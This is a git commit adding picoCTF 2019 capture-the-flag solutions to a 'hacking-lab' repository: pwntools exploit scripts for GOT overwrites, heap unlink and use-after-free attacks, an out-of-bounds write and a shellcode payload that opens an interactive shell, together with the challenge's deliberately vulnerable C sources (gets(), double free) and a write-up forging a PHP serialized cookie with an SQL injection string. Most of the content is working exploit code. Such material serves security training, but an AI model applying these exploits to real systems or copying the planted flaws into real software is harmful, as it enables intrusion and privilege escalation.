[writeup] add picoctf 2019 (part)

Author: onealmond

README.md

@@ -1,14 +1,14 @@
 # hacking-lab
 ---
 
-# google ctf 2019
+# Google CTF 2019
 - [jit](google-ctf-2019/jit/shellcode.py)
 - [cryptoqkd](google-ctf-2019/cryptoqkd.web.ctfcompetition.com/post.py)
 - [malvertising](google-ctf-2019/malvertising/writeup.md)
 - [MicroServiceDaemonOS](google-ctf-2019/MicroServiceDaemonOS/shellcode.py)
 - [dialtone](google-ctf-2019/dialtone/writeup.md)
 
-# picoctf 2019
+# PicoCTF 2019
 - [c0rrypt](picoctf-2019/c0rrupt/writeup.md)
 - [CanaRy](picoctf-2019/CanaRy/shellcode.py)
 - [overflow-0](picoctf-2019/overflow-0/shellcode.py)
@@ -26,6 +26,17 @@
 - [the numbers](picoctf-2019/the_numbers/writeup.md)
 - [rop32](picoctf-2019/rop32/shellcode.py)
 - [slippery-shellcode](picoctf-2019/slippery-shellcode/writeup.md)
+- [messy-malloc](picoctf-2019/messy-malloc/writeup.md)
+- [leap-frog](picoctf-2019/leap-frog/writeup.md)
+- [stringzz](picoctf-2019/stringzz/writeup.md)
+- [GoT](picoctf-2019/GoT/writeup.md)
+- [pointy](picoctf-2019/pointy/writeup.md)
+- [rop64](picoctf-2019/rop64/shellcode.py)
+- [AfterLife](picoctf-2019/AfterLife/shellcode.py)
+- [L1im1tL335](picoctf-2019/L1im1tL335/writeup.md)
+- [SecondLife](picoctf-2019/SecondLife/shellcode.py)
+- [Heap Overflow](picoctf-2019/HeapOverflow/shellcode.py)
+- [Cereal Hacker 1](picoctf-2019/cereal-hacker1/writeup.md)
 
 # Hacker101 CTF
 - [MicroCMS v2](hacker101-ctf/micro-cms-v2/writeup.md)

picoctf-2019/AfterLife/shellcode.py

@@ -0,0 +1,30 @@
+import pwn
+
+remote_binary = "/problems/afterlife_5_5cb2854d168d1e297b97921c0b4231f3/vuln"
+
+def attack():
+    pr = pwn.process([remote_binary,'A'])
+    try:
+        elf = pwn.ELF(remote_binary, False)
+        payload = pwn.p32(elf.got["exit"] - 12)
+
+        """
+        Try to get addres of ``first`` pointer
+        ```
+        Oops! a new developer copy pasted and printed an address as a decimal...
+        153387016
+        you will write on first after it was freed... an overflow will not be very useful...
+        ```
+        """
+        pr.readline()
+        first = int(pr.readline())
+
+        payload += pwn.p32(first + 8)
+        payload += pwn.asm("push {};ret;".format(elf.sym["win"]))
+        pr.writelineafter("an overflow will not be very useful...\n", payload)
+        rsp = pr.readall(timeout=0.5)
+        print(rsp)
+    finally:
+        pr.close()
+
+attack()

picoctf-2019/AfterLife/vuln.c

@@ -0,0 +1,37 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <fcntl.h>
+#include <unistd.h>
+#define FLAG_BUFFER 200
+#define LINE_BUFFER_SIZE 20
+
+void win() {
+  char buf[FLAG_BUFFER];
+  FILE *f = fopen("flag.txt","r");
+  fgets(buf,FLAG_BUFFER,f);
+  fprintf(stdout,"%s\n",buf);
+  fflush(stdout);
+}
+
+int main(int argc, char *argv[])
+{
+   //This is rather an artificial pieace of code taken from Secure Coding in c by Robert C. Seacord 
+   char *first, *second, *third, *fourth;
+   char *fifth, *sixth, *seventh;
+   first=malloc(256);
+   printf("Oops! a new developer copy pasted and printed an address as a decimal...\n");
+   printf("%d\n",first);
+   strncpy(first,argv[1],LINE_BUFFER_SIZE);
+   second=malloc(256);
+   third=malloc(256);
+   fourth=malloc(256);
+   free(first);
+   free(third);
+   fifth=malloc(128);
+   puts("you will write on first after it was freed... an overflow will not be very useful...");
+   gets(first);
+   seventh=malloc(256);
+   exit(0);
+}
+

picoctf-2019/GoT/shellcode.py

@@ -0,0 +1,18 @@
+import os;os.environ['TMPDIR'] = os.path.join(os.environ['HOME'], 'tmp')
+import pwn
+
+remote_binary = "/problems/got_5_c5119617c90aa544a639812dbc41e24e/vuln"
+
+def segfault():
+    try:
+        pr = pwn.process(remote_binary)
+        elf = pwn.ELF(remote_binary, False)
+        print(elf.got)
+        pr.sendlineafter("Input address\n", str(elf.got["exit"]))
+        pr.sendlineafter("Input value?\n", str(elf.sym["win"]))
+        rsp = pr.readall(timeout=0.5)
+        print(rsp)
+    finally:
+        pr.close()
+
+segfault()

picoctf-2019/GoT/vuln.c

@@ -0,0 +1,28 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#define FLAG_BUFFER 128
+
+void win() {
+  char buf[FLAG_BUFFER];
+  FILE *f = fopen("flag.txt","r");
+  fgets(buf,FLAG_BUFFER,f);
+  puts(buf);
+  fflush(stdout);
+}
+
+
+int *pointer;
+
+int main(int argc, char *argv[])
+{
+  
+   puts("You can just overwrite an address, what can you do?\n");
+   puts("Input address\n");
+   scanf("%d",&pointer);
+   puts("Input value?\n");
+   scanf("%d",pointer);
+   puts("The following line should print the flag\n");
+   exit(0);
+}

picoctf-2019/GoT/writeup.md

@@ -0,0 +1 @@
+The program allow user change value stored in address. We want to call the ``win`` function to print the flag. We can change an address in GOT table to address of ``win``, the selected one should be called later, lets' try change address of ``exit`` function to address of ``win``, when fake ``exit`` being called the flag is printed.

picoctf-2019/HeapOverflow/shellcode.py

@@ -0,0 +1,37 @@
+# Reference: https://www.win.tue.nl/~aeb/linux/hh/hh-11.html
+import os; os.environ["TMPDIR"] = os.path.join(os.environ['HOME'], 'tmp')
+import pwn
+
+remote_binary = "/problems/heap-overflow_1_3f101d883699357e88af6bd1165695cd/vuln"
+
+def attack():
+    pr = pwn.process([remote_binary], cwd=os.path.dirname(remote_binary))
+    try:
+        elf = pwn.ELF(remote_binary, False)
+        payload = pwn.p32(elf.got["exit"] - 12)
+
+        pr.readline()
+        fullname = int(pr.readline())
+
+        # fullname
+        shellcode = pwn.asm("jmp skip;" + "nop;"*100 + "{} skip: nop;".format(pwn.shellcraft.i386.linux.sh())).ljust(672-4)
+        shellcode += pwn.p32(73).ljust(72)
+        shellcode += pwn.p32(0x101)
+        print(pwn.hexdump(shellcode))
+        print("shellcode length:", len(shellcode))
+        pr.writelineafter("Input fullname\n", shellcode)
+
+        # lastname
+        payload = pwn.p32(0x101) # set size to 0
+        payload += pwn.p32(elf.got["exit"]-12) + pwn.p32(fullname+8)
+        payload = payload.ljust(256 - 4)
+        payload =  "A" * (256-4) + payload + pwn.p32(0x101) # set size to 0
+
+        print(pwn.hexdump(payload))
+        print("payload length:", len(payload))
+        pr.writelineafter("Input lastname\n", payload)
+        pr.interactive()
+    finally:
+        pr.close()
+
+attack()

picoctf-2019/HeapOverflow/vuln.c

@@ -0,0 +1,32 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#define FLAGSIZE 128
+
+void win() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  fgets(buf,FLAGSIZE,f);
+  fprintf(stdout,"%s\n",buf);
+  fflush(stdout);
+}
+
+int main(int argc, char *argv[])
+{
+   char *fullname, *name, *lastname;
+   fullname = malloc(666);
+   name = malloc(66);
+   lastname = malloc(66);
+   printf("Oops! a new developer copy pasted and printed an address as a decimal...\n");
+   printf("%d\n",fullname);
+   printf("Input fullname\n");
+   gets(fullname);
+   printf("Input lastname\n");
+   gets(lastname);
+   free(fullname);
+   puts("That is all...\n");
+   free(name);
+   free(lastname);
+   exit(0);
+}

picoctf-2019/L1im1tL335/shellcode.py

@@ -0,0 +1,21 @@
+import os; os.environ['TMPDIR'] = os.path.join(os.environ['HOME'], 'tmp')
+import pwn
+
+remote_binary = "/problems/l1im1tl355_4_b2111fe5737c985221bac06a80d6d6c7/vuln"
+dst = "2019shell1.picoctf.com"
+
+def attack():
+    elf = pwn.ELF(remote_binary)
+    for i in range(-512, 0, 1):
+      pr = pwn.process(remote_binary, cwd=os.path.dirname(remote_binary))
+      try:
+          pr.writelineafter("Input the integer value you want to put in the array\n", str(elf.sym["win"]))
+          pr.writelineafter("Input the index in which you want to put the value\n", str(i))
+          rsp = pr.readall(timeout=0.5)
+          if "pico" in rsp:
+                print(rsp)
+                break
+      finally:
+          pr.close()
+
+attack()

picoctf-2019/L1im1tL335/vuln.c

@@ -0,0 +1,32 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#define FLAG_BUFFER 128
+
+void win() {
+  char buf[FLAG_BUFFER];
+  FILE *f = fopen("flag.txt","r");
+  fgets(buf,FLAG_BUFFER,f);
+  puts(buf);
+  fflush(stdout);
+}
+
+void replaceIntegerInArrayAtIndex(unsigned int *array, int index, int value) {
+   array[index] = value;
+}
+
+int main(int argc, char *argv[])
+{
+   int index;
+   int value;
+   int array[666];
+   puts("Input the integer value you want to put in the array\n");
+   scanf("%d",&value);
+   fgetc(stdin);
+   puts("Input the index in which you want to put the value\n");
+   scanf("%d",&index);
+   replaceIntegerInArrayAtIndex(array,index,value);
+   exit(0);
+}
+

picoctf-2019/L1im1tL335/writeup.md

@@ -0,0 +1,4 @@
+The program allows user to input integer value into specific position addressed by index. We can overwrite the function return address with address of``win``. To find out the address we needs try out some possible numbers.
+
+So we input address of ``win`` for the first integer value, try out index in range ``[-512, 0]``.
+Finally ``-5`` brought the flag.

picoctf-2019/SecondLife/shellcode.py

@@ -0,0 +1,25 @@
+import os; os.environ["TMPDIR"] = os.path.join(os.environ['HOME'], 'tmp')
+import pwn
+
+remote_binary = "/problems/secondlife_6_c4811a8968ff26d298eda578d3b92255/vuln"
+
+def attack():
+    pr = pwn.process([remote_binary,'A'], cwd=os.path.dirname(remote_binary))
+    try:
+        elf = pwn.ELF(remote_binary, False)
+        payload = pwn.p32(elf.got["exit"] - 12)
+
+        pr.readline()
+        first = int(pr.readline())
+        print("first:", first)
+
+        payload += pwn.p32(first + 8)
+        payload += pwn.asm("push {};ret;".format(elf.sym["win"]))
+        pr.writeline("A")
+        pr.writelineafter("an overflow will not be very useful...\n", payload)
+        rsp = pr.readall(timeout=0.5)
+        print(rsp)
+    finally:
+        pr.close()
+
+attack()

picoctf-2019/SecondLife/vuln.c

@@ -0,0 +1,39 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <fcntl.h>
+#include <unistd.h>
+#define FLAG_BUFFER 200
+#define LINE_BUFFER_SIZE 20
+
+void win() {
+  char buf[FLAG_BUFFER];
+  FILE *f = fopen("flag.txt","r");
+  fgets(buf,FLAG_BUFFER,f);
+  fprintf(stdout,"%s\n",buf);
+  fflush(stdout);
+}
+
+int main(int argc, char *argv[])
+{
+   //This is rather an artificial pieace of code taken from Secure Coding in c by Robert C. Seacord 
+   char *first, *second, *third, *fourth;
+   char *fifth, *sixth, *seventh;
+   first=malloc(256);
+   printf("Oops! a new developer copy pasted and printed an address as a decimal...\n");
+   printf("%d\n",first);
+   fgets(first, LINE_BUFFER_SIZE, stdin);
+   second=malloc(256);
+   third=malloc(256);
+   fourth=malloc(256);
+   free(first);
+   free(third);
+   fifth=malloc(128);
+   free(first);
+   sixth=malloc(256);
+   puts("You should enter the got and the shellcode address in some specific manner... an overflow will not be very useful...");
+   gets(sixth);
+   seventh=malloc(256);
+   exit(0);
+}
+

picoctf-2019/cereal-hacker1/writeup.md

@@ -0,0 +1,23 @@
+
+Tried to login as ``guest:guest``, it redirect to ``/index.php?file=regular_user``. checkout application cookies, the value of ``user_info`` looks suspicious. it is a url-encoded base64 string.
+
+
+After decoding, we got a object description
+```
+O:11:"permissions":2:{s:8:"username";s:5:"guest";s:8:"password";s:5:"guest";}
+```
+
+``O`` => Object
+``s`` => string attribute
+
+Number indicates the length of the following value.
+
+If we change ``guest`` to ``admin``, then we can visit as admin. we need SQL injection to bypass the password.
+
+```
+pw = "password' or '1'='1"
+user_info = 'O:11:"permissions":2:{s:8:"username";s:5:"admin";s:8:"password";s:'+str(len(pw))+':"'+pw+'";}'
+cookie = base64.b64encode(s.encode())
+```
+
+Replace the value of ``user_info`` with the updated one, try to visit admin page ``/index.php?file=admin``, now we have the flag.